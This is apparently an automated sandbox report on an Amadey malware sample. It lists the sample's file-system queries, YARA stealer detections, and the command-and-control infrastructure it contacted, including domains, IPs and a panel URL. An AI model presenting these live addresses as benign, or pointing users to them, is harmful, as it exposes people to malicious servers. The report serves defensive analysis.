Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000427001\ma.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Amadey
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Yara detected Amadeys stealer DLL
Source: Yara match File source: oTIHRjz4dn.exe, type: SAMPLE
Source: Yara match File source: 0.0.oTIHRjz4dn.exe.800000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1651432093.0000000000801000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1432635 Sample: oTIHRjz4dn.exe Startdate: 27/04/2024 Architecture: WINDOWS Score: 100 9 greatnessappreviews.com 2->9 11 rtattack.xycydau0.fun 2->11 17 Snort IDS alert for network traffic 2->17 19 Multi AV Scanner detection for domain / URL 2->19 21 Found malware configuration 2->21 23 7 other signatures 2->23 6 oTIHRjz4dn.exe 35 2->6         started        signatures3 process4 dnsIp5 13 greatnessappreviews.com 45.156.23.149, 49733, 49735, 49737 CLOUDBACKBONERU Russian Federation 6->13 15 45.129.199.237, 80 CREEPERHOSTLTD-ASGB Russian Federation 6->15
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
45.156.23.149
 greatnessappreviews.com Russian Federation
56971 CLOUDBACKBONERU true
45.129.199.237
 unknown Russian Federation
201971 CREEPERHOSTLTD-ASGB false

Contacted Domains

Name IP Active
greatnessappreviews.com 45.156.23.149 true
rtattack.xycydau0.fun unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://greatnessappreviews.com/8BvxwQdec3/index.php?scr=1 true
  • 3%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
greatnessappreviews.com/8BvxwQdec3/index.php true
  • 2%, Virustotal, Browse
  • Avira URL Cloud: safe
 low
http://greatnessappreviews.com/8BvxwQdec3/index.php true
  • 2%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown